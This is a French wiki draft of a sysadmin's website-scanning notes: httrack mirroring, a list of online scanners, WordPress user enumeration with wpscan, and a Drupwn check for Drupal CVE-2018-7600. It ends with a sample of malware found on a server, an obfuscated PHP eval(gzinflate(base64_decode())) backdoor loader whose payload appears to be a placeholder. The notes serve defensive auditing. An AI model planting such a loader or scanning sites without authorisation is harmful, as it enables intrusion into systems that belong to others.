{{tag>Brouillon Web}}

= Scan site Web

Voir aussi :
* https://kvz.io/blog/obtain-all-text-from-your-website.html


httrack - Télécharger tous les fichiers .js
<code bash>
httrack -* +mime:text/html +*.js
#httrack --mirror https://www.acme.fr -* +mime:text/html +*.js -r9999
</code>

<code bash>
pip install pyFreenet3 --use-pep517
./bin/copyweb --mirror http://www.acme.fr -d sites/
</code>

Voir 
https://doc.ubuntu-fr.org/httrack

== Scan en ligne 

Voir :
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools


Liste de scanners :
* https://www.virustotal.com
* https://observatory.mozilla.org/
* https://sitecheck.sucuri.net/
* https://app.upguard.com/webscan#
* https://app.webinspector.com
* https://wpscans.com/


=== Scan Wordpress

https://github.com/wpscanteam/wpscan
<code bash>
docker run -it --rm wpscanteam/wpscan --url http://www.acme.fr --enumerate u
</code>


=== Scan Drupal

<code bash>
#git clone https://github.com/immunIT/drupwn
#pip install --user -r requirements.txt
docker run --rm -it immunit/drupwn enum https://www.acme.fr
</code>

<code ->
Drupwn> check CVE-2018-7600

[+] Application vulnerable
</code>


== Exemple de malware 

<code ->
stat m7hw6o0xhn.php                                                                                                                          
  File: 'm7hw6o0xhn.php'
  Size: 1797            Blocks: 8          IO Block: 4096   regular file
Device: fc07h/64519d    Inode: 596         Links: 1
Access: (0644/-rw-r--r--)  Uid: ( 1000/sftp-acme)   Gid: ( 1000/sftp-acme)
Access: 2019-02-08 15:26:13.957265343 +0100
Modify: 2018-03-27 10:53:45.000000000 +0200
Change: 2018-05-22 18:02:27.736483258 +0200
 Birth: -
</code>

''/var/www/acme.fr/www.acme.fr/m7hw6o0xhn.php''
<code php>
<?php

eval("\n\$dgreusdi = intval(__LINE__) * 337;");

$a = "0123456789abcdef";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));
</code>